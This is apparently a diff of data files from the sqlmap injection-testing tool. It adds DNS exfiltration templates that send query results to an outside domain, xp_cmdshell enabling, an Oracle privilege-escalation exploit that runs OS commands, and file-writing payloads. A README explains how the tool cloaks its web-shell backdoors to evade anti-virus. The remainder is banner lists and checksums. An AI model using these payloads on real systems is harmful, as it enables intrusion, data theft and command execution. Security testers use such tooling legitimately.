+EXEC('master..xp_dirtree "\\'+@host+'\%RANDSTR1%"')
+# or EXEC('master..xp_fileexist "\\'+@host+'\%RANDSTR1%"')

data/procs/mssqlserver/enable_xp_cmdshell_2000.sql

@@ -0,0 +1 @@
+EXEC master..sp_addextendedproc 'xp_cmdshell', @dllname='xplog70.dll'

data/procs/mssqlserver/run_statement_as_user.sql

@@ -0,0 +1,3 @@
+SELECT * FROM OPENROWSET('SQLOLEDB','';'%USER%';'%PASSWORD%','SET FMTONLY OFF %STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLNCLI', 'server=(local);trusted_connection=yes','SET FMTONLY OFF SELECT 1;%STATEMENT%')
+# SELECT * FROM OPENROWSET('SQLOLEDB','Network=DBMSSOCN;Address=;uid=%USER%;pwd=%PASSWORD%','SET FMTONLY OFF %STATEMENT%')

data/procs/mysql/dns_request.sql

@@ -0,0 +1 @@
+SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%RANDSTR1%'))

data/procs/mysql/write_file_limit.sql

@@ -0,0 +1 @@
+LIMIT 0,1 INTO OUTFILE '%OUTFILE%' LINES TERMINATED BY 0x%HEXSTRING%-- -

data/procs/oracle/dns_request.sql

@@ -0,0 +1,3 @@
+SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual 

data/procs/oracle/read_file_export_extension.sql

@@ -0,0 +1,4 @@
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "OsUtil" as import java.io.*; public class OsUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function OSREADFILE(filename in varchar2) return varchar2 as language java name ''''''''OsUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) FROM DUAL
+SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('%RANDSTR1%','%RANDSTR2%','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on OSREADFILE to public'''';END;'';END;--','SYS',0,'1',0) FROM DUAL

data/procs/postgresql/dns_request.sql

@@ -0,0 +1,14 @@
+DROP TABLE IF EXISTS %RANDSTR1%;
+# https://wiki.postgresql.org/wiki/CREATE_OR_REPLACE_LANGUAGE <- if "CREATE LANGUAGE plpgsql" is required
+CREATE TABLE %RANDSTR1%(%RANDSTR2% text);
+CREATE OR REPLACE FUNCTION %RANDSTR3%()
+RETURNS VOID AS $$
+DECLARE %RANDSTR4% TEXT;
+DECLARE %RANDSTR5% TEXT;
+BEGIN
+SELECT INTO %RANDSTR5% (%QUERY%);
+%RANDSTR4% := E'COPY %RANDSTR1%(%RANDSTR2%) FROM E\'\\\\\\\\%PREFIX%.'||%RANDSTR5%||E'.%SUFFIX%.%DOMAIN%\\\\%RANDSTR6%\'';
+EXECUTE %RANDSTR4%;
+END;
+$$ LANGUAGE plpgsql SECURITY DEFINER;
+SELECT %RANDSTR3%();

data/shell/README.txt

@@ -0,0 +1,7 @@
+Due to the anti-virus positive detection of shell scripts stored inside this folder, we needed to somehow circumvent this. As from the plain sqlmap users perspective nothing has to be done prior to their usage by sqlmap, but if you want to have access to their original source code use the decrypt functionality of the ../../extra/cloak/cloak.py utility.
+
+To prepare the original scripts to the cloaked form use this command:
+find backdoors/backdoor.* stagers/stager.* -type f -exec python ../../extra/cloak/cloak.py -i '{}' \;
+
+To get back them into the original form use this:
+find backdoors/backdoor.*_ stagers/stager.*_ -type f -exec python ../../extra/cloak/cloak.py -d -i '{}' \;

data/shell/backdoors/backdoor.asp_

@@ -0,0 +1,3 @@
+=ªòÜ©«t µ›ÉøbŒð‹ÒëRÁU&hÓàŸR}DtCñ–!¶³3ç¤y¨œ>—à7ôë	pQMÆÀb-{Yž?<3F>=úáÑl<C391>ÜÙ²„]½6a\ÝÍ5Ñ
+¡§]iª¾³Z©Á*ðpO|ØSkœã“ã¬ÐC)<29>1š»Os|èEÀ„f@l§<6C>{ä´a2¹ßý(¾ÌPrãÇ8CÓ©•nð%f•¢ßš A<>ú=¬‹@ç(x™~£•Üïê­Ö±†$ˉ)9<ˆWt³2SG„·Ê5©
+B䤚2…€TX<54>zO3sG<73>DëLú

data/txt/common-outputs.txt

@@ -1,5 +1,5 @@
-# Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
-# See the file 'doc/COPYING' for copying permission
+# Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
+# See the file 'LICENSE' for copying permission
 
 [Banners]
 
@@ -11,32 +11,65 @@
 5.0.
 5.1.
 5.5.
+5.6.
+5.7.
 6.0.
+8.0.
 
 # PostgreSQL
+PostgreSQL 7.0
+PostgreSQL 7.1
+PostgreSQL 7.2
 PostgreSQL 7.3
 PostgreSQL 7.4
+PostgreSQL 8.0
 PostgreSQL 8.1
 PostgreSQL 8.2
 PostgreSQL 8.3
 PostgreSQL 8.4
+PostgreSQL 8.5
+PostgreSQL 9.0
+PostgreSQL 9.1
+PostgreSQL 9.2
+PostgreSQL 9.3
+PostgreSQL 9.4
+PostgreSQL 9.5
+PostgreSQL 9.6
+PostgreSQL 10.
+PostgreSQL 11.
+PostgreSQL 12.
+PostgreSQL 13.
 
 # Oracle
 Oracle Database 9i Standard Edition Release
+Oracle Database 9i Standard Edition Release 9.
 Oracle Database 9i Express Edition Release
+Oracle Database 9i Express Edition Release 9.
 Oracle Database 9i Enterprise Edition Release
+Oracle Database 9i Enterprise Edition Release 9.
 Oracle Database 10g Standard Edition Release
+Oracle Database 10g Standard Edition Release 10.
 Oracle Database 10g Express Edition Release
 Oracle Database 10g Enterprise Edition Release
+Oracle Database 10g Enterprise Edition Release 10.
 Oracle Database 11g Standard Edition Release
+Oracle Database 11g Standard Edition Release 11.
 Oracle Database 11g Express Edition Release
+Oracle Database 11g Express Edition Release 11.
 Oracle Database 11g Enterprise Edition Release
+Oracle Database 11g Enterprise Edition Release 11.
+Oracle Database 12c
 
 # Microsoft SQL Server
 Microsoft SQL Server 7.0
 Microsoft SQL Server 2000
 Microsoft SQL Server 2005
 Microsoft SQL Server 2008
+Microsoft SQL Server 2012
+Microsoft SQL Server 2014
+Microsoft SQL Server 2016
+Microsoft SQL Server 2017
+Microsoft SQL Server 2019
 
 
 [Users]
@@ -366,6 +399,7 @@ XDBWEBSERVICES
 
 # MySQL
 information_schema
+performance_schema
 mysql
 phpmyadmin
 
@@ -1064,3 +1098,99 @@ Update_priv
 User
 x509_issuer
 x509_subject
+
+# Oracle (types)
+BINARY_INTEGER
+BLOB
+BOOLEAN
+CHAR
+CLOB
+DATE
+INTERVAL
+LONG
+MLSLABEL
+NCHAR
+NCLOB
+NUMBER
+NVARCHAR2
+RAW
+ROWID
+TIMESTAMP
+VARCHAR
+VARCHAR2
+XMLType
+
+# MySQL (types)
+bigint
+blob
+char
+date
+datetime
+decimal
+double
+enum
+float
+int
+set
+smallint
+text
+time
+tinyint
+varchar
+year
+
+# Microsoft SQL Server (types)
+bigint
+binary
+bit
+char
+cursor
+date
+datetime
+datetime2
+datetimeoffset
+decimal
+float
+image
+int
+money
+nchar
+ntext
+numeric
+nvarchar
+real
+smalldatetime
+smallint
+smallmoney
+sql_variant
+table
+text
+time
+timestamp
+tinyint
+uniqueidentifier
+varbinary
+varchar
+xml
+
+# PostgreSQL (types)
+bigint
+bigserial
+boolean
+bpchar
+bytea
+character
+date
+decimal
+double precision
+int4
+integer
+interval
+money
+numeric
+real
+serial
+smallint
+text
+time
+timestamp

data/txt/sha256sums.txt

@@ -0,0 +1,630 @@
+39a8a35d730f49daf657fa58903a9cd309813b275df29a86439297a10a15261a  data/html/index.html
+e70317eb90f7d649e4320e59b2791b8eb5810c8cad8bc0c49d917eac966b0f18  data/procs/mssqlserver/activate_sp_oacreate.sql
+6a2de9f090c06bd77824e15ac01d2dc11637290cf9a5d60c00bf5f42ac6f7120  data/procs/mssqlserver/configure_openrowset.sql
+798f74471b19be1e6b1688846631b2e397c1a923ad8eca923c1ac93fc94739ad  data/procs/mssqlserver/configure_xp_cmdshell.sql
+5dfaeac6e7ed4c3b56fc75b3c3a594b8458effa4856c0237e1b48405c309f421  data/procs/mssqlserver/create_new_xp_cmdshell.sql
+3c8944fbd4d77b530af2c72cbabeb78ebfb90f01055a794eede00b7974a115d0  data/procs/mssqlserver/disable_xp_cmdshell_2000.sql
+afb169095dc36176ffdd4efab9e6bb9ed905874469aac81e0ba265bc6652caa4  data/procs/mssqlserver/dns_request.sql
+657d56f764c84092ff4bd10b8fcbde95c13780071b715df0af1bc92b7dd284f2  data/procs/mssqlserver/enable_xp_cmdshell_2000.sql
+1b7d521faca0f69a62c39e0e4267e18a66f8313b22b760617098b7f697a5c81d  data/procs/mssqlserver/run_statement_as_user.sql
+9b8b6e430c705866c738dd3544b032b0099a917d91c85d2b25a8a5610c92bcdf  data/procs/mysql/dns_request.sql
+02b7ef3e56d8346cc4e06baa85b608b0650a8c7e3b52705781a691741fc41bfb  data/procs/mysql/write_file_limit.sql
+02be5ce785214cb9cac8f0eab10128d6f39f5f5de990dea8819774986d0a7900  data/procs/oracle/dns_request.sql
+606fe26228598128c88bda035986281f117879ac7ff5833d88e293c156adc117  data/procs/oracle/read_file_export_extension.sql
+4d448d4b7d8bc60ab2eeedfe16f7aa70c60d73aa6820d647815d02a65b1af9eb  data/procs/postgresql/dns_request.sql
+7e3e28eac7f9ef0dea0a6a4cdb1ce9c41f28dd2ee0127008adbfa088d40ef137  data/procs/README.txt
+3fa42f7428a91d94e792ad8d3cb76109cfe2632d918ae046e32be5a2b51ad3d8  data/shell/backdoors/backdoor.asp_
+7943c1d1e8c037f5466f90ed91cc88441beb0efab83ef5ae98473d2aee770b65  data/shell/backdoors/backdoor.aspx_
+9d9d0bdd4145df96058977a39be924f0facdba9efa7b585848101dafbcb7b02e  data/shell/backdoors/backdoor.jsp_
+8a7a73a4c841e92ece79942e03a18df046f90ba43e6af6c4f8fbb77f437bce07  data/shell/backdoors/backdoor.php_
+a08e09c1020eae40b71650c9b0ac3c3842166db639fdcfc149310fc8cf536f64  data/shell/README.txt
+67ce7eec132297594f7fd31f93f8d044df3d745c01c70c5afc320848eb4aa149  data/shell/stagers/stager.asp_
+099eb0f9ed71946eb55bd1d4afa1f1f7ef9f39cc41af4897f3d5139524bd2fc2  data/shell/stagers/stager.aspx_
+f2648a0cb4d5922d58b8aa6600f786b32324b9ac91e3a57e4ff212e901ffe151  data/shell/stagers/stager.jsp_
+84b431647a2c13e72b2c9c9242a578349d1b8eef596166128e08f1056d7e4ac8  data/shell/stagers/stager.php_
+31676dcadde4c2eef314ef90e0661a57d2d43cb52a39ef991af43fcb6fa9af22  data/txt/common-columns.txt
+bb88fcfc8eae17865c4c25c9031d4488ef38cc43ab241c7361ae2a5df24fd0bb  data/txt/common-files.txt
+e456db93a536bc3e7c1fbb6f15fbac36d6d40810c8a754b10401e0dab1ce5839  data/txt/common-outputs.txt
+1c5095ba246934be2a7990bf11c06703f48ebba53f0dba18107fcf44e11a5cea  data/txt/common-tables.txt
+4ee746dcab2e3b258aa8ff2b51b40bef2e8f7fc12c430b98d36c60880a809f03  data/txt/keywords.txt
+c5ce8ea43c32bc72255fa44d752775f8a2b2cf78541cbeaa3749d47301eb7fc6  data/txt/smalldict.txt
+895f9636ea73152d9545be1b7acaf16e0bc8695c9b46e779ab30b226d21a1221  data/txt/user-agents.txt
+9c2d6a0e96176447ab8758f8de96e6a681aa0c074cd0eca497712246d8f410c6  data/txt/wordlist.tx_
+849c61612bd0d773971254df2cc76cc18b3d2db4051a8f508643278a166df44e  data/udf/mysql/linux/32/lib_mysqludf_sys.so_
+20b5a80b8044da1a0d5c5343c6cbc5b71947c5464e088af466a3fcd89c2881ef  data/udf/mysql/linux/64/lib_mysqludf_sys.so_
+8e6ae0e3d67e47261df064aa1536f99e56d4f001cc7f800c3d93b091c3c73115  data/udf/mysql/windows/32/lib_mysqludf_sys.dll_
+51d055d00863655e43e683377257953a19728a0ae9a3fe406768289474eb4104  data/udf/mysql/windows/64/lib_mysqludf_sys.dll_
+9340f3d10dcca0d72e707f22cf1c4c6581b979c23d6f55a417ee41d9091bb9d1  data/udf/postgresql/linux/32/10/lib_postgresqludf_sys.so_
+dc1199c029dff238e971fd3250916eb48503daa259464c24f22cd2cd51f5ccd8  data/udf/postgresql/linux/32/11/lib_postgresqludf_sys.so_
+0b6a7e34fbbd27adaa8beda36ce20e93fd65b8e3ce93bf44703c514ebdd1cef0  data/udf/postgresql/linux/32/8.2/lib_postgresqludf_sys.so_
+922fb68413b05031e9237414cf50a04e0e43f0d1c7ef44cfb77305eea0b6f2fe  data/udf/postgresql/linux/32/8.3/lib_postgresqludf_sys.so_
+029ffa3b30a4c6cb10f5271b72c2a6b8967cdab0d23c8e4b0e5e75e2a5c734f2  data/udf/postgresql/linux/32/8.4/lib_postgresqludf_sys.so_
+52f9a6375099cb9c37ca1b8596c2e89a75ed6b8a2493b486ef3cd0230eaa6591  data/udf/postgresql/linux/32/9.0/lib_postgresqludf_sys.so_
+436e0bf6961f4d25321a6fe97bfa73ab2926175d5b93e9c4b0dbcd38a926ca31  data/udf/postgresql/linux/32/9.1/lib_postgresqludf_sys.so_
+6817b485450aed7a634ece8c6c12007ab38e6954c8cbc7a530b101347e788cbc  data/udf/postgresql/linux/32/9.2/lib_postgresqludf_sys.so_
+a2de5ca53411f38dadc1535a58d7416a3758a126feec6becb4e0e33c974825f3  data/udf/postgresql/linux/32/9.3/lib_postgresqludf_sys.so_
+17e2f86c94b4cffb8de37b10456142f5a1bf3d500345bf508f16c9a359fbf005  data/udf/postgresql/linux/32/9.4/lib_postgresqludf_sys.so_
+5ffdaac7d85ac18e5bbae2776522d391d92ca18b2862c3d1d03fa90effcfb918  data/udf/postgresql/linux/32/9.5/lib_postgresqludf_sys.so_
+5fae599c42bb650a2c0ba8111ca64d52bb82ac1ea0e982a3c0f59587d166eb5b  data/udf/postgresql/linux/32/9.6/lib_postgresqludf_sys.so_
+ded0da0260fea0c91e02839d2e06e62741cc25ac5d74b351b0a26e0c0abcd8de  data/udf/postgresql/linux/64/10/lib_postgresqludf_sys.so_
+81e9f38cb47753f5b9f472eddd227023c44f6b302b7c03eca65dd9836856de69  data/udf/postgresql/linux/64/11/lib_postgresqludf_sys.so_
+87b0d86661eaf8bf58664a3aa241cc33525cf3dc1043ed60a82cf123d8ae3873  data/udf/postgresql/linux/64/12/lib_postgresqludf_sys.so_
+925a7b8a3904906b8402e707ed510e9ac7598ee30a90f5464d14a3678998cb90  data/udf/postgresql/linux/64/8.2/lib_postgresqludf_sys.so_
+c55ac17eaf8f4353ac1abbecb3165ebfceeed438780f9c1d8eb863a6f40d64f4  data/udf/postgresql/linux/64/8.3/lib_postgresqludf_sys.so_
+aecdef1198ad2bdfdebc82ba001b6d6c2d08cc162271a37d0a55ae8e5a0e3aa0  data/udf/postgresql/linux/64/8.4/lib_postgresqludf_sys.so_
+f128717b9930c4fd919da004dacc50487923d56239a68a2566d33212acc09839  data/udf/postgresql/linux/64/9.0/lib_postgresqludf_sys.so_
+965355721e6d5ada50e3f0fe576f668ee62adae0810a34c8024fb40c5301443b  data/udf/postgresql/linux/64/9.1/lib_postgresqludf_sys.so_
+adfb9f1841af68b03f7dfe68234236034cb09d6be28902eda7d66792b667b58a  data/udf/postgresql/linux/64/9.2/lib_postgresqludf_sys.so_
+b0d30e633532c28f693fbb91a67274b3d347cbefa0dfae8d6dafa2b934d9be14  data/udf/postgresql/linux/64/9.3/lib_postgresqludf_sys.so_
+7acbfe3ddd2d0083fe5d6a9f614008b0659539a5401bdf99d9bcd3667901e4dc  data/udf/postgresql/linux/64/9.4/lib_postgresqludf_sys.so_
+191dc3607fdb4bad4e4231fd0d63c5926aa4055df024a083ea0ec0bbec6e3258  data/udf/postgresql/linux/64/9.5/lib_postgresqludf_sys.so_
+a6717d5da8c4515f9b53bcd2343a4d496dbdcf92c5b05e210f62731e2fa89ce7  data/udf/postgresql/linux/64/9.6/lib_postgresqludf_sys.so_
+611e1f025b919a75ec9543720cac4b02669967dab46e671f0328e75314852951  data/udf/postgresql/windows/32/8.2/lib_postgresqludf_sys.dll_
+b427b65cc8b585cd02361f5155ffab2fe52fd5943100382c6b86cd0f52f352d9  data/udf/postgresql/windows/32/8.3/lib_postgresqludf_sys.dll_
+c444fd667a09927a22c92e855d206249e761c1fbd4f3630f7ee06265eb2576ee  data/udf/postgresql/windows/32/8.4/lib_postgresqludf_sys.dll_
+c6be099a5dee34f3a7570715428add2e7419f4e73a7ce9913d3fb76eea78d88e  data/udf/postgresql/windows/32/9.0/lib_postgresqludf_sys.dll_
+0a6d5fc399e9958477c8a71f63b7c7884567204253e0d2389a240d83ed83f241  data/udf/README.txt
+4e268596da67fb0b6a10a7cefb38af5de13f67dab760cc0505f8f80484a0fe79  data/xml/banner/generic.xml
+2adcdd08d2c11a5a23777b10c132164ed9e856f2a4eca2f75e5e9b6615d26a97  data/xml/banner/mssql.xml
+14b18da611d4bfad50341df89f893edf47cd09c41c9662e036e817055eaa0cfb  data/xml/banner/mysql.xml
+6d1ab53eeac4fae6d03b67fb4ada71b915e1446a9c1cc4d82eafc032800a68fd  data/xml/banner/oracle.xml
+9f4ca1ff145cfbe3c3a903a21bf35f6b06ab8b484dad6b7c09e95262bf6bfa05  data/xml/banner/postgresql.xml
+86da6e90d9ccf261568eda26a6455da226c19a42cc7cd211e379cab528ec621e  data/xml/banner/server.xml
+146887f28e3e19861516bca551e050ce81a1b8d6bb69fd342cc1f19a25849328  data/xml/banner/servlet-engine.xml
+7973d2024e7803951445a569b591e151edcc322c00213f478dcd9aff23afd226  data/xml/banner/set-cookie.xml
+a7eb4d1bcbdfd155383dcd35396e2d9dd40c2e89ce9d5a02e63a95a94f0ab4ea  data/xml/banner/sharepoint.xml
+e2febc92f9686eacf17a0054f175917b783cc6638ca570435a5203b03245fc18  data/xml/banner/x-aspnet-version.xml
+75672f8faa8053af0df566a48700f2178075f67c593d916313fcff3474da6f82  data/xml/banner/x-powered-by.xml
+1ac399c49ce3cb8c0812bb246e60c8a6718226efe89ccd1f027f49a18dbeb634  data/xml/boundaries.xml
+130eef6c02dc5749f164660aa4210f75b0de35aaf2afef94b329bb1e033851f7  data/xml/errors.xml
+cfa1f0557fb71be0631796a4848d17be536e38f94571cf6ef911454fbc6b30d1  data/xml/payloads/boolean_blind.xml
+f2b711ea18f20239ba9902732631684b61106d4a4271669125a4cf41401b3eaf  data/xml/payloads/error_based.xml
+b0f434f64105bd61ab0f6867b3f681b97fa02b4fb809ac538db382d031f0e609  data/xml/payloads/inline_query.xml
+0648264166455010921df1ec431e4c973809f37ef12cbfea75f95029222eb689  data/xml/payloads/stacked_queries.xml
+997556b6170964a64474a2e053abe33cf2cf029fb1acec660d4651cc67a3c7e1  data/xml/payloads/time_blind.xml
+40a4878669f318568097719d07dc906a19b8520bc742be3583321fc1e8176089  data/xml/payloads/union_query.xml
+e16d35a818ad7c4a2cafbfd250c27408b2cb632aa00ba124666bef2b9e35d055  data/xml/queries.xml
+abb6261b1c531ad2ee3ada8184c76bcdc38732558d11a8e519f36fcc95325f7e  doc/AUTHORS
+68550be6eeb800bb54b1b47877412ecc88cf627fb8c88aaee029687152eb3fc1  doc/CHANGELOG.md
+2df1f15110f74ce4e52f0e7e4a605e6c7e08fbda243e444f9b60e26dfc5cf09d  doc/THANKS.md
+f939c6341e3ab16b0bb9d597e4b13856c7d922be27fd8dba3aa976b347771f16  doc/THIRD-PARTY.md
+792bcf9bf7ac0696353adaf111ee643f79f1948d9b5761de9c25eb0a81a998c9  doc/translations/README-bg-BG.md
+7f48875fb5a369b8a8aaefc519722462229ce4e6c7d8f15f7777092d337e92dd  doc/translations/README-ckb-KU.md
+4689fee6106207807ac31f025433b4f228470402ab67dd1e202033cf0119fc8a  doc/translations/README-de-DE.md
+2b3d015709db7e42201bc89833380a2878d7ab604485ec7e26fc4de2ad5f42f0  doc/translations/README-es-MX.md
+f7b6cc0d0fdd0aa5550957db9b125a48f3fb4219bba282f49febc32a7e149e74  doc/translations/README-fa-IR.md
+3eac203d3979977b4f4257ed735df6e98ecf6c0dfcd2c42e9fea68137d40f07c  doc/translations/README-fr-FR.md
+26524b18e5c4a1334a6d0de42f174b948a8c36e95f2ec1f0bc6582a14d02e692  doc/translations/README-gr-GR.md
+d505142526612a563cc71d6f99e0e3eed779221438047e224d5c36e8750961db  doc/translations/README-hr-HR.md
+a381ff3047aab611cf1d09b7a15a6733773c7c475c7f402ef89e3afe8f0dd151  doc/translations/README-id-ID.md
+e88d3312a2b3891c746f6e6e57fbbd647946e2d45a5e37aab7948e371531a412  doc/translations/README-in-HI.md
+34a6a3a459dbafef1953a189def2ff798e2663db50f7b18699710d31ac0237f8  doc/translations/README-it-IT.md
+2120fd640ae5b255619abae539a4bd4a509518daeff0d758bbd61d996871282f  doc/translations/README-ja-JP.md
+a8027759aaad33b38a52533dbad60dfba908fe8ac102086a6ad17162743a4fd9  doc/translations/README-ka-GE.md
+343e3e3120a85519238e21f1e1b9ca5faa3afe0ed21fbb363d79d100e5f4cf0c  doc/translations/README-ko-KR.md
+f04fce43c6fb217f92b3bcae5ec151241d3c7ce951f5b98524d580aa696c5fa2  doc/translations/README-nl-NL.md
+fc304f77f0d79ac648220cb804e5683abdf0f7d61863dda04a415297d1a835f4  doc/translations/README-pl-PL.md
+f8a4659044c63f9e257960110267804184a3a9d5a109ec2c62b1f47bc45184e7  doc/translations/README-pt-BR.md
+42f5d2ebffcf4b1be52005cc3e44f99df2c23713bd15c2bcedfe1c77760c3cf1  doc/translations/README-rs-RS.md
+c94d5c9ae4e4b996eaf0d06a6c5323a12f22653bb53c5eaf5400ee0bccf4a1eb  doc/translations/README-ru-RU.md
+622d9a1f22d07e2fefdebbd6bd74e6727dc14725af6871423631f3d8a20a5277  doc/translations/README-sk-SK.md
+6d690c314fe278f8f949b27cd6f7db0354732c6112f2c8f764dcf7c2d12d626f  doc/translations/README-tr-TR.md
+0bccce9d2e48e7acc1ef126539a50d3d83c439f94cc6387c1331a9960604a2cd  doc/translations/README-uk-UA.md
+285c997e8ae7381d765143b5de6721cad598d564fd5f01a921108f285d9603a2  doc/translations/README-vi-VN.md
+b553a179c731127a115d68dfb2342602ad8558a42aa123050ba51a08509483f6  doc/translations/README-zh-CN.md
+98dd22c14c12ba65ca19efca273ef1ef07c45c7832bfd7daa7467d44cb082e76  extra/beep/beep.py
+509276140d23bfc079a6863e0291c4d0077dea6942658a992cbca7904a43fae9  extra/beep/beep.wav
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  extra/beep/__init__.py
+c8a0f9ea14315b9ac57097cbf383f57eb3dffda57f46efaf38fcdb68fdb94638  extra/cloak/cloak.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  extra/cloak/__init__.py
+6879b01859b2003fbab79c5188fce298264cd00300f9dcecbe1ffd980fe2e128  extra/cloak/README.txt
+0d16bc2624e018c38fd7fa8e936eb4b81d49726cacc62b87a1c4210bf2a08f5f  extra/dbgtool/dbgtool.py
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  extra/dbgtool/__init__.py
+a777193f683475c63f0dd3916f86c4b473459640c3278ff921432836bc75c47f  extra/dbgtool/README.txt
+a87035e5923f5b56077dfbd18cda5aa5e2542f0707b7b55f7bbeb1960ae3cc9a  extra/icmpsh/icmpsh.exe_
+2fcce0028d9dd0acfaec497599d6445832abad8e397e727967c31c834d04d598  extra/icmpsh/icmpsh-m.c
+8c38efaaf8974f9d08d9a743a7403eb6ae0a57b536e0d21ccb022f2c55a16016  extra/icmpsh/icmpsh-m.pl
+12014ddddc09c58ef344659c02fd1614157cfb315575378f2c8cb90843222733  extra/icmpsh/icmpsh_m.py
+1589e5edeaf80590d4d0ce1fd12aa176730d5eba3bfd72a9f28d3a1a9353a9db  extra/icmpsh/icmpsh-s.c
+ab6ee3ee9f8600e39faecfdaa11eaa3bed6f15ccef974bb904b96bf95e980c40  extra/icmpsh/__init__.py
+27af6b7ec0f689e148875cb62c3acb4399d3814ba79908220b29e354a8eed4b8  extra/icmpsh/README.txt
+99d0e94dd5fe60137abf48bfa051129fb251f5c40f0f7a270c89fbcb07323730  extra/__init__.py
+191e3e397b83294082022de178f977f2c59fa99c96e5053375f6c16114d6777e  extra/runcmd/README.txt
+25be5af53911f8c4816c0c8996b5b4932543efd6be247f5e18ce936679e7d1cd  extra/runcmd/runcmd.exe_
+70bd8a15e912f06e4ba0bd612a5f19a6b35ed0945b1e370f9b8700b120272d8f  extra/runcmd/src/README.txt
+084aea8f337e1aed405a581603324ec01951eadcfd7b4eefaf3000b73f8b2e1e  extra/runcmd/src/runcmd/runcmd.cpp
+e5c02d18abf544eebd18bd789121eaee4d638bae687402feafdd6daec18e82a1  extra/runcmd/src/runcmd/runcmd.vcproj
+7c2a12c21b61f727a2b3c6e85bd098e7f8a8b585a74b5eb31eb676ac776d5d57  extra/runcmd/src/runcmd.sln
+5e67c579a62715812a56731396d4cb432f16774a69f82629c6a3218174333605  extra/runcmd/src/runcmd/stdafx.cpp
+7bd768f3a742dcebddbe76de26eeee1438355d8600fb19dce945eef6486a3edb  extra/runcmd/src/runcmd/stdafx.h
+38f59734b971d1dc200584936693296aeebef3e43e9e85d6ec3fd6427e5d6b4b  extra/shellcodeexec/linux/shellcodeexec.x32_
+b8bcb53372b8c92b27580e5cc97c8aa647e156a439e2306889ef892a51593b17  extra/shellcodeexec/linux/shellcodeexec.x64_
+cfa1f8d02f815c4e8561f6adbdd4e84dda6b6af6c7a0d5eeb9d7346d07e1e7ad  extra/shellcodeexec/README.txt
+cb43de49a549ae5524f3066b99d6bc3b0b684c6e68c2e75602e87b2ac5718716  extra/shellcodeexec/windows/shellcodeexec.x32.exe_
+384805687bfe5b9077d90d78183afcbd4690095dfc4cc12b2ed3888f657c753c  extra/shutils/autocompletion.sh
+2f5dfcffc21b5bf7c48cd6c6dbb73d65d624c22e879128bb73b6a74fe508d2fe  extra/shutils/blanks.sh
+0a19945245096f0d1607546f7e254fa39b38a9ed95a246d748996e0a1a1f273a  extra/shutils/drei.sh
+1e166de9426354ed3eb9d474a7be0268ffccefa068cab2063bbce3a60e98c2b4  extra/shutils/duplicates.py
+138bd14cd77b033a0ebf75e27ecceb64a81137167d9d269c00c99082f9d6e6db  extra/shutils/junk.sh
+4d0a244b7c618e1539c72180f909792083c02cec31e27b44eec98b0055163536  extra/shutils/modernize.sh
+74fe683e94702bef6b8ea8eebb7fc47040e3ef5a03dec756e3cf4504a00c7839  extra/shutils/newlines.py
+fed05c468af662ba6ca6885baf8bf85fec1e58f438b3208f3819ad730a75a803  extra/shutils/postcommit-hook.sh
+dc35b51f5c9347eda8130106ee46bb051474fc0c5ed101f84abf3e546f729ceb  extra/shutils/precommit-hook.sh
+9a82c097f16a3062bd0e818bff12b4ec21b6f8f38b778604573a416589dfc450  extra/shutils/pycodestyle.sh
+fa1a42d189188770e82d536821d694626ca854438dadb9e08e143d3ece8c7e27  extra/shutils/pydiatra.sh
+5da7d1c86ca93313477d1deb0d6d4490798a2b63a2dd8729094184625b971e11  extra/shutils/pyflakes.sh
+c941be05376ba0a99d329e6de60e3b06b3fb261175070da6b1fc073d3afd5281  extra/shutils/pylint.sh
+a19725f10ff9c5d484cffd8f1bd9348918cc3c4bfdd4ba6fffb42aaf0f5c973c  extra/shutils/pypi.sh
